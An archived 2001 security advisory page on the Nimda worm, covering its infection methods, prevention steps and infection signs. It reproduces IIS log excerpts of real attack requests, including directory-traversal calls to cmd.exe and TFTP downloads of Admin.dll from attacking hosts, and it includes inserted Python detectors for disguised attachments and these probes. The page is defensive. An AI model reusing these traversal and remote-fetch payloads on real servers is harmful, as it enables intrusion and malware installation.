WordType Designs
Driven To Distractions©
The Sound of One Hand Clapping©


Archive Date
[ 04-11-2001 ]
Category
[ Information Technologies ]
sub-Category
[ Microsoft ]

      Nimda Worm Information
      A new worm, known as W32.Nimda.A@mm, Nimda or README.EXE, is propagating across the Internet through e-mail and network attacks. The e-mail carries an attachment called README.EXE with a MIME type of "audio/x-wav", together with some HTML parts. The message appears to contain no text when Outlook displays it in Auto-Preview mode.
      The worm launches a wide variety of network attacks against IIS servers. Several of these scan for machines already compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directories, and attempting to use the /c and /d virtual roots to reach CMD.EXE). It also attempts to exploit numerous other known IIS vulnerabilities.

      Infection Methods
      1. E-mail, as an attachment of MIME type audio/x-wav.
      2. Browsing an infected web server with JavaScript execution enabled, using a version of IE vulnerable to the exploits discussed in MS01-020 (e.g. IE 5.0 or IE 5.01 without SP2).
      3. Machine to machine, in the form of IIS attacks (primarily attempting to exploit the vulnerabilities created by a Code Red II infection, but also vulnerabilities previously patched by MS00-078).
      4. Highlighting a .eml or .nws file in Explorer with Active Desktop enabled (the default on W2K/ME/W98): THUMBVW.DLL will execute the file and attempt to download the README.EXE referenced in it (depending on your IE version and zone settings).
      5. Mapped drives. Any infected machine that has mapped network drives will likely infect all of the files on the mapped drive and its subdirectories.
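The first infection method above, an executable attachment declared as audio/x-wav, can be caught at the mail gateway by checking the declared MIME type against the attachment's name and the bytes it actually carries. This is an added example and not code from the original page: the message is constructed to mirror the layout described (not a real Nimda capture), and the function names are my own.

```python
import os
import email
from email import policy

# Constructed sample modelled on the message layout described above: an HTML
# part beside an executable declared as audio/x-wav. Not a real Nimda capture;
# the base64 body is only a harmless DOS/PE 'MZ' header stub.
SAMPLE_MSG = b"""From: sender@example.invalid
To: user@example.invalid
Subject: hello
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html; charset="us-ascii"

<html><body></body></html>
--outer
Content-Type: audio/x-wav; name="README.EXE"
Content-Transfer-Encoding: base64
Content-ID: <README.EXE>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--outer--
"""

EXECUTABLE_EXTS = {".exe", ".dll", ".com", ".scr", ".pif", ".bat", ".vbs"}

def suspicious_attachments(raw):
    """One finding per attachment whose name says 'executable' but whose
    declared MIME type does not (the README.EXE / audio/x-wav pattern)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename() or ""      # Content-Disposition or name= parameter
        ext = os.path.splitext(name)[1].lower()
        ctype = part.get_content_type()
        if ext in EXECUTABLE_EXTS and not ctype.startswith("application/"):
            payload = part.get_payload(decode=True) or b""
            findings.append({
                "filename": name,
                "declared_type": ctype,
                "mz_header": payload[:2] == b"MZ",  # Windows executables start with MZ
            })
    return findings

def is_nimda_style(raw):
    """True when a disguised executable is present and its bytes look like a PE."""
    return any(f["mz_header"] for f in suspicious_attachments(raw))
```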
      Prevention
      1. Ensure all IE installations are version 5.01 SP2 or later.
      2. Disable Active Scripting in IE.
      3. Ensure all IIS installations have MS01-044 applied.
      4. Install URLScan from Microsoft (http://www.microsoft.com/technet/security/urlscan.asp) and set up rules to block invalid requests.
      5. Use the CACLS program to modify the permissions on TFTP.EXE and CMD.EXE to remove all use:
      CACLS %systemroot%\system32\tftp.exe /E /D Everyone
      CACLS %systemroot%\system32\tftp.exe /E /D System

      CACLS %systemroot%\system32\cmd.exe /E /D Everyone
      CACLS %systemroot%\system32\cmd.exe /E /D System

      (Note: this could be tried with THUMBVW.DLL as well.)

      6. Ensure that TFTP is not permitted out through your network gateway (note that newly infected machines may try to TFTP *internally* from some other infected machine on your network).
      7. Modify or remove the following registry keys:

      HKEY_CLASSES_ROOT\.eml
      HKEY_CLASSES_ROOT\.nws

      Infection Signs
      Nimda is viral, so while you can remove the various files it drops, it probably will not be cleaned completely by manual means. You will have to use your antivirus vendor's product to clean the system completely.

      1. The following is appended to EVERY HTML file on the machine: <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
      2. Just about every directory on the machine has one or more files with the extension .eml, mostly readme.eml but also other names that seem to correspond to directory or other file names. A total of 1234 .eml files were created, totalling 98Mb (about 78Kb each), along with 55 files with the extension .nws containing exactly the same content. Both .eml and .nws files can be opened by Outlook Express.
      3. The virus makes numerous outbound connections to port 80 to propagate itself to other servers.
      4. The virus sets IE5 to IE4 compatibility mode (apparently to circumvent security) and crashes Explorer.exe when IE is launched. IExplore.exe appears to be hacked, and there is now a hidden "IExplore .exe" (note the space before the extension) in the same directory.
      5. Virus code in a stealth executable named tftp###, where ### is any numeric string. The file has no extension, but it is definitely a Windows executable. It is placed in \Program Files\Common Files\System\MSADC, and in the same directory Admin.dll appears to be hacked.
      6. IIS console hacked: a new MMC.EXE is placed in the \WINNT directory, which may override the original version in \WINNT\System32.
      7. Load.exe dropped as a hidden/system file (probably in %systemroot%).
      8. Readme.exe dropped in every directory.
      9. Admin.dll dropped in /scripts and/or root directories (not the _vti_bin directories of FrontPage).
      10. EXE files placed in the TEMP directory. Note that most/all hacked EXE files are flagged Hidden.
      11. Riched20.dll files placed in random directories (not on the PATH, not containing executables).
      12. The NT "Guest" account was made a member of the NT "Administrators" group!

      Portions of this information were provided by Russ Cooper from NTBugTraq

      Examples:

      #Software: Microsoft Internet Information Services 5.0
      #Version: 1.0
      #Date: 2001-10-31 05:03:03
      #Fields: date time c-ip cs-username s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs-host cs(User-Agent)

      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/root.exe /c+dir 404 www -
      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /MSADC/root.exe /c+dir 404 www -
      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /c/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /d/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 502 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.241.136%20GET%20Admin.dll%20c:\Admin.dll 502 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.241.136%20GET%20Admin.dll%20d:\Admin.dll 502 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.241.136%20GET%20Admin.dll%20e:\Admin.dll 502 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /msadc/..%5c../..%5c../..%5c/..Á_../..Á_../..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 www -

      2001-10-31 05:29:52 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/root.exe /c+dir 404 www -
      2001-10-31 05:29:52 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /MSADC/root.exe /c+dir 404 www -
      2001-10-31 05:29:53 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /c/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:53 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /d/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:53 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:53 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 502 www -
      2001-10-31 05:29:55 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20cool.dll%20c:\httpodbc.dll 502 www -
      2001-10-31 05:29:55 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20cool.dll%20d:\httpodbc.dll 502 www -
      2001-10-31 05:29:55 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20cool.dll%20e:\httpodbc.dll 502 www -
      2001-10-31 05:29:56 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 www -
      2001-10-31 05:29:56 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:56 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /msadc/..%5c../..%5c../..%5c/..Á_../..Á_../..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:56 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:57 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:57 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:59 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:30:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:30:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:30:02 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:30:03 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 www -

      2001-10-31 07:05:26 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/root.exe /c+dir 404 www -
      2001-10-31 07:05:26 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /MSADC/root.exe /c+dir 404 www -
      2001-10-31 07:05:26 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /c/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:05:26 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /d/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:05:27 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:05:29 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 502 www -
      2001-10-31 07:05:41 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20Admin.dll%20c:\Admin.dll 502 www -
      2001-10-31 07:05:46 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20Admin.dll%20d:\Admin.dll 502 www -
      2001-10-31 07:05:49 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20Admin.dll%20e:\Admin.dll 502 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /msadc/..%5c../..%5c../..%5c/..Á_../..Á_../..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:01 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:01 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:01 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:01 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:01 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 www -
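The probe lines above follow a fixed sequence (ROOT.EXE in /scripts and /MSADC, CMD.EXE via the /c and /d roots or ..%5c.. traversal, then a TFTP fetch of Admin.dll or a similar DLL), so a log reader can recognise them and group them per source address. The following is an added example, not code from the original page: it parses the W3C extended format from the #Fields line, classifies each request, and reports per client IP. The sample log is constructed with RFC 5737 documentation addresses rather than the page's real client IPs, and the signature names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample in the IIS 5.0 W3C extended format used on this page.
# Client addresses are RFC 5737 documentation ranges, not the page's real IPs.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-username s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs-host cs(User-Agent)
2001-10-31 05:22:57 192.0.2.10 - HostName 10.0.0.5 80 GET /scripts/root.exe /c+dir 404 www -
2001-10-31 05:22:57 192.0.2.10 - HostName 10.0.0.5 80 GET /MSADC/root.exe /c+dir 404 www -
2001-10-31 05:22:57 192.0.2.10 - HostName 10.0.0.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
2001-10-31 05:22:58 192.0.2.10 - HostName 10.0.0.5 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll%20c:\\Admin.dll 502 www -
2001-10-31 05:23:01 192.0.2.10 - HostName 10.0.0.5 80 GET /_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 www -
2001-10-31 05:23:10 198.51.100.7 - HostName 10.0.0.5 80 GET /index.htm - 200 www Mozilla/4.0
2001-10-31 05:23:11 198.51.100.7 - HostName 10.0.0.5 80 GET /images/logo.gif - 200 www Mozilla/4.0
"""

SIGNATURES = [
    ("codered2-backdoor", re.compile(r"/root\.exe$")),      # ROOT.EXE left behind by Code Red II
    ("cmd-exe", re.compile(r"/cmd\.exe$")),                 # direct or traversal reach for CMD.EXE
    ("traversal", re.compile(r"\.\.[\\/]")),                # ..%5c.. / ..%2f.. after decoding
    ("unicode-traversal", re.compile(r"%c0%af|%c1%1c")),    # MS00-078 overlong UTF-8 forms
]

def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def classify(rec):
    """Return the set of signature names one log record matches."""
    raw = rec.get("cs-uri-stem", "").lower()
    stem = unquote(raw)                 # %5c -> \ and %2f -> / so traversal shows plainly
    query = unquote(rec.get("cs-uri-query", "")).lower()
    hits = {name for name, rx in SIGNATURES if rx.search(stem) or rx.search(raw)}
    if "tftp" in query:                 # payload fetch (Admin.dll, cool.dll, httpodbc.dll)
        hits.add("tftp-fetch")
    return hits

def nimda_report(text):
    """Per client IP, count how often each signature fired; clean clients are absent."""
    report = {}
    for rec in parse_w3c(text):
        for hit in classify(rec):
            counts = report.setdefault(rec["c-ip"], {})
            counts[hit] = counts.get(hit, 0) + 1
    return report
```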

